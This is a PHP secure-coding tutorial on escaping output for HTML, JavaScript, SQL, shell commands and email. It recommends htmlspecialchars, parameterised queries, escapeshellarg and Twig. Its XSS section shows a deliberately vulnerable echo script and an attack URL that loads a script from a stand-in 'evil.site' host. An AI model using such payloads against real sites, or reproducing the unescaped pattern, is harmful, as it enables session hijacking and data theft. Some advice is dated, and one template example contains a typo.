Safer PHP output

Most PHP scripts produce output of some kind. When you produce that output, you need to make sure that your output is properly escaped, whether you're making an HTML page, an XML file or a JSON feed. PHP can't do this automatically, so you need to know what output escaping is, and how, when and why to do it.

To understand output escaping, it's useful to know how HTML works. The M stands for Mark-up; in other words, an HTML file contains both content and commands. The commands mark up sections of content – as headings, bold text, or scripts – or they embed special characters, images, or scripts. To separate content and commands, HTML reserves three characters: <, >, and &. HTML tags are wrapped with the < and > characters, which means you can't use them for anything else.

So what if you want to write < or > in your content? You need to use HTML entities. These are commands that embed special characters. Specifically these four entities:

Character Entity name Entity code
< Less-than &lt;
> Greater-than &gt;
& Ampersand &amp;
" Double-quote &quot;

There are about 250 other named entities (and numeric ones too), but if you use UTF-8 these are the only four HTML entities you'll ever need.

So when you output into an HTML page with PHP, you need to convert <, >, and & in your output into the HTML entities for those characters, otherwise you'll either trip up the parser (breaking your layout), or worse, insert HTML commands where you don't mean to. There's a whole class of attacks that exploit non-escaped output: they're called cross-site scripting attacks (or XSS for short; CSS was already taken!)

The anatomy of an XSS attack

Here's a terrible script:

<?php
$name = $_GET['name'];  
echo "Hi $name!";

It's terrible for two reasons: the first is that the input isn't filtered. You can read about doing that here. The second is that the output isn't escaped. This means that someone can create a URL like http://example.com/yourscript.php?name=<script src="http://evil.site/evil.js"></script> and then then send that URL to someone else.

When they click on it, the remote script is run on your page in the visitor's web browser. It has access to everything that visitor does on your site. If they're logged in, then that script can steal or set cookies (allowing an attacker to hijack a login session), it can perform actions using the visitor's login (like ordering a product to a different address, creating a new user, etc – this is a sub-class of attack called "Cross site request forgery"). It can change the HTML of your page to add forms and links that ask for personal and financial details. In short, it's bad news. But it's also easy to avoid.

Basic HTML escaping

The first thing to do is to filter your input. Names will never need to contain HTML tags, so just use the default FILTER_SANITIZE_STRING filter, and it'll remove HTML and PHP tags. The second thing to do is to escape your output using the htmlspecialchars() function. Either approach will help on its own, but you should always use both.

<?php
$name = filter_input(INPUT_GET, 'name', FILTER_SANITIZE_STRING);
echo 'Hi '. htmlspecialchars($name, ENT_COMPAT, 'UTF-8');

The second argument in the htmlspecialchars() call is ENT_COMPAT. I've used that because it's a safe default: it will also escape double-quote characters ". You only really need to do that if you're outputting inside an HTML attribute (like <img src="<?php echo htmlspecialchars($img_path, ENT_COMPAT, 'UTF-8')">). You could use ENT_NOQUOTES everywhere else. While I've got your ear: I know that technically you can use single-quotes in HTML 4 attributes (<br clear='all'>), but don't. It's horrible.

Notice that you should specify the output encoding in the third argument. If you've never heard about character sets and encoding before, you're probably from a native English-speaking country, and you don't know how annoying they were until Unicode came long. The good news is that for pretty much anything you'd want to do in PHP, using UTF-8 consistently will deal with all those nasty little problems.

If you don't, the function will use the default encoding which could be ISO-8859-1 (before PHP 5.4), UTF-8 (after), or something else entirely (because you can't be sure how someone's PHP environment is configured or which version they're running). Providing the output encoding saves headaches now and in the future.

When to escape output

You might be tempted to escape variables when you load them in. Something like:

<?php
$name = htmlspecialchars(filter_input(INPUT_GET, 'name'), ENT_COMPAT, 'UTF-8');

Don't do this. Escape output when you're outputting, not before. Escaping output depends on the kind of output you're producing. What if you want to make a CSV file later? Or a JSON response to an AJAX script? Both need different kinds of escaping, and seeing a load of &lt;s in your Excel sheet isn't going to improve your day.

Also if you're coding well, the code that does stuff will be separate from the code that shows stuff on screen, and you'll be able to tell just by looking at your template whether your output has been escaped, instead of needing to trace a variable back all the way through your code.

Other forms of output escaping

XML

Many XML libraries (like the built-in SimpleXML, DOMDocument and XMLWriter) will handle escaping for you; check first though, double-escaping is embarrassing, but not escaping at all can be deadly.

Javascript

PHP doesn't have a built-in way to escape Javascript, but you can cheat and use the json_encode() function. There are some important caveats:

  1. Make sure your output is a string. json_encode() does much more than just string conversion.
  2. JSON is always UTF-8, so make sure the page you're embedding it in is too.
  3. If you're setting a Javascript variable which will then be displayed as HTML, you need to use htmlspecialchars() and json_encode().

A much better idea is to use the Zend Escaper component from the Zend Framework. It's available as a Composer package so it's easy to install and easier to use:

<?php
use Zend\Escaper\Escaper;

$escaper = new Escaper('UTF-8');
echo $escaper->escapeJs($name);

As with json_encode(), if you're outputting a javascript string which will wind up as HTML on a page somewhere, you should escape the HTML too:

<?php
    echo $escaper->escapeJs( $escaper->escapeHtml($name) );

If you're using Twig templates (they're fantastic, by the way; highly recommended), then you can escape javascript safely like this:

{{ name | e('js') }}

Database (SQL)

You can escape SQL, but there's a much better alternative, which is to use so-called "parameterised queries". Most databases support these. In a parameterised query, you put placeholders in your SQL command where the data would normally go and then send the data separately, so there's never a chance that data can be mis-interpreted as a command (a class of attack known as "SQL injection"). The database (or database library) will safely combine the command and data itself. Prepared SQL statements with placeholders are safer than constructing the full SQL command yourself, and can be much quicker (especially if it's a statement that'll be run multiple times).

SQL injection attacks are among the worst kind of website security hole; they're easy to discover, easy to exploit, and the potential for damage is tremendous, especially if your database isn't properly secured.

I've got a separate article about using prepared statements in PDO and the Doctrine DBAL (which extends it). If you're not using one of these (or something that builds on them, like Doctrine ORM or Laravel's Eloquent ORM if you still think ActiveRecord is cool), then you're crazy.

Command-line tools

Obviously the potential for mischief when you expose the command-line to the web via your script is pretty bad. If you can possibly avoid it (and most likely you can), then do. If you must, then use escapeshellarg() on each argument you pass to exec(), system() or the backtick operator.

Among the Symfony Process component's many nifty features, its ProcessBuilder class will automatically prepare and escape a command for you:

<?php
use Symfony\Component\Process\ProcessBuilder;

$builder = new ProcessBuilder(array('ls', '-lsa'));
$builder->getProcess()->run();

Email

If you don't properly escape output for email headers, a moderately clever attacker can highjack the entire message and replace it with one of their own, sent to whoever they like. The easy way to avoid this is not to use PHP's built-in mail() function at all, and instead use something like Swiftmailer or Zend Mail:

Both Zend Mail and Swift Mailer offer huge advantages over the plain mail() function; for example they can handle attachments, easy HTML email, inline images and encrypted mail server connections, so safe output escaping is only one good reason to use them.

printing HTML

It's bad form to write PHP that writes HTML: it's harder to update your page layout, and it's harder to correctly escape your output. So avoid this:

<?php
echo "<a href=\"$url\">$name</a>"; 
?>

And instead do this:

<a href="<?php echo htmlspecialchars($url, ENT_COMPAT, 'utf-8'); ?>">
    <php echo htmlspecialchars($name, ENT_NOQUOTES, 'utf-8'); ?>
</a>

If you're thinking that looks long, ugly and verbose, then … well, you're right. Use Twig instead, and you'll get a cleaner separation of code and templates, manual and automatic output escaping, and template inheritance that can really reduce the amount of work needed to update your site.

Installing Twig

Installing and setting up Twig is easy with the Composer PHP package manager. Download it with Composer:

composer require twig/twig

Twig setup

It's good practice to keep most of your code, templates and libraries out of your website's root folder. Ideally something like:

Put most of your code in src/, and place just enough code in web/ to load and run that code. For the sake of a short example though, here's a basic web/example.php and templates/index.twig:

Twig's easy to learn and use, and tremendously powerful. Read the documentation to get started.


Disclaimer

It should go without saying, but any example code shown on this site is yours to use without obligation or warranty of any kind. As far as it's possible to do so, I release it into the public domain.